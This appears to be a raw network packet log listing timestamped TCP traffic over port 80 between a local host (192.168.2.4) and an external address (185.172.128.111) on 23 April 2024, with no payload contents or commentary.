Apr 23, 2024 09:27:09.341216087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.341562986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.341600895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.341620922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.341639996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.341653109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.341690063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.341753006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.341789007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.341804981 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.341825962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.341850042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.341880083 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.341993093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.342031956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.342046022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.342068911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.342078924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.342122078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.342433929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.342478037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.342489958 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.342530012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.342531919 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.342582941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.342742920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.342793941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.342808962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.342896938 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.342931986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.342936039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.342936039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.342982054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.343106985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.343146086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.343162060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.343183994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.343202114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.343240023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.343472004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.343511105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.343545914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.343555927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.343555927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.343594074 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.343832970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.343871117 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.343889952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.343908072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.343928099 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.343954086 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.344096899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.344161987 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.344168901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.344207048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.391107082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.391233921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445096970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445167065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445207119 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445245028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445241928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445241928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445241928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445301056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445331097 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445338964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445354939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445377111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445383072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445415020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445420027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445451021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445456028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445487022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445492029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445522070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445535898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445578098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445585012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445616007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445636034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445651054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445656061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445688009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445704937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445724010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445729017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445760012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445774078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445796013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445832014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445842028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445842028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445868015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.445873022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.445910931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.495610952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.495671988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.495712042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.495748043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.495789051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.495824099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.495861053 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.495897055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.495932102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.495970011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496006966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496042967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496078014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496092081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496092081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496093035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496093035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496093035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496093035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496093035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496093035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496145964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496189117 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496227980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496242046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496242046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496242046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496242046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496242046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496242046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496242046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496265888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496301889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496315956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496315956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496340036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496354103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496380091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496387959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496417046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496428013 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496454954 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496462107 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496490955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496495008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496527910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496546984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496563911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496578932 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496603012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496643066 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496648073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496648073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496681929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496691942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496717930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496730089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496753931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496763945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496789932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496804953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496828079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496841908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496865034 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496876955 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496901989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496921062 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496937990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.496946096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.496978998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.497016907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.497014046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.497055054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.497062922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.497062922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.497100115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.546606064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.546669006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.546710968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.546746969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.546783924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.546819925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.546854973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.546860933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.546860933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.546860933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.546860933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.546860933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.546861887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.546892881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.546936035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.546948910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.546948910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.546976089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.546981096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547013044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547033072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547049999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547056913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547086000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547113895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547122955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547136068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547161102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547178030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547199011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547209024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547235012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547251940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547272921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547291994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547311068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547322989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547348976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547367096 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547384977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547405005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547421932 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547429085 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547458887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547482967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547493935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547511101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547530890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547547102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547569036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547585964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547605991 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547625065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547641993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547663927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547681093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547689915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547718048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547733068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547755957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547763109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547791958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547827005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547836065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547836065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547864914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547872066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547903061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547919989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547940969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547955036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.547977924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.547993898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548015118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548023939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548051119 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548086882 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548098087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548098087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548154116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548156977 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548196077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548202038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548232079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548242092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548268080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548275948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548310995 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548383951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548423052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548440933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548465014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548480034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548501968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548516035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548538923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548556089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548576117 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548585892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548629045 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548741102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548778057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.548789024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.548829079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.549107075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.549144983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.549160004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.549190998 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.549241066 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.549278975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.549309969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.549336910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.549654007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.549690962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.549709082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.549726963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.549736023 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.549762964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.549779892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.549798965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.549803972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.549838066 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.549849033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.549884081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.597484112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.597554922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.597716093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.597716093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.651853085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.651917934 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.651957989 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.651954889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.651994944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.652023077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.652023077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.652033091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.652050018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.652070045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.652079105 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.652136087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.652170897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.652173042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.652194977 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.652216911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.652229071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.652254105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:09.652264118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:09.652302980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.177432060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:11.383188963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.485615015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.485651016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.485661983 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.485671997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.485721111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.485735893 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.485747099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.485757113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.485986948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:11.486000061 CEST	80	49730	185.172.128.111	192.168.2.4
